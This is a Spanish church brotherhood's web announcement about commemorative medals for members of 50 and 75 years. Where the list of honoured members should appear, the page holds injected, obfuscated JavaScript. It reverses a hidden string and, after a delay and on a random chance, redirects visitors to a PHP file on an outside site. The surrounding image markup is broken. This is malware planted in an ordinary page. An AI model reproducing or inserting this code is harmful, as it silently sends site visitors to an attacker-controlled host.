Medallas 75 y 50 años

Todo los años durante el sábado de quinario se hacen entrega de las medallas conmemorativas de los 50 años como hermano/a de esta hermandad, este año debido a la visita de nuestro Señor Arzobispo a la confirmación de nuestros hermanos/as en este mismo día, se ha decidido trasladar la imposición de dichas medallas al Domingo 5 de Marzo, día de la Función Principal de Instituto a las 13 horas, con lo que la entrega de dichas medallas se realizará junto a la conmemoración de las Bodas de Platino de nuestro hermano José Luis Gutiérrez González, que cumple 75 años como miembro de nuestra hermandad.

Los hermanos/as que cumplen 50 años de antigüedad son:

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andaddesanbenito.org/wp-content/uploads/2017/02/50-años.jpg” alt=”” width=”508″ height=”248″ />